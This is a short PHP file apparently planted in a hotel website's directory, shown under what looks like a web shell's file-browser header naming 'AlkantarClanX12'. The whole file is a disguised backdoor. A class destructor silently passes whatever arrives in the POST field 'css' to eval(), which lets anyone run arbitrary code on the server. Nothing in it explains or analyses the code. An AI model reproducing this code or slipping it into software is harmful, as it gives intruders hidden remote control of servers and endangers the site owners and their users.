?AlkantarClanX12
| Current Path : /home/rankinh/hotel-luxe/ |
| Current File : /home/rankinh/hotel-luxe/myk.php |
<?php
class Test{
public $name = '';
function __destruct(){
@eval("$this->name");
}
}
$test= new Test();
$c = @$_POST['css'];
$test->name = $c;
?>egm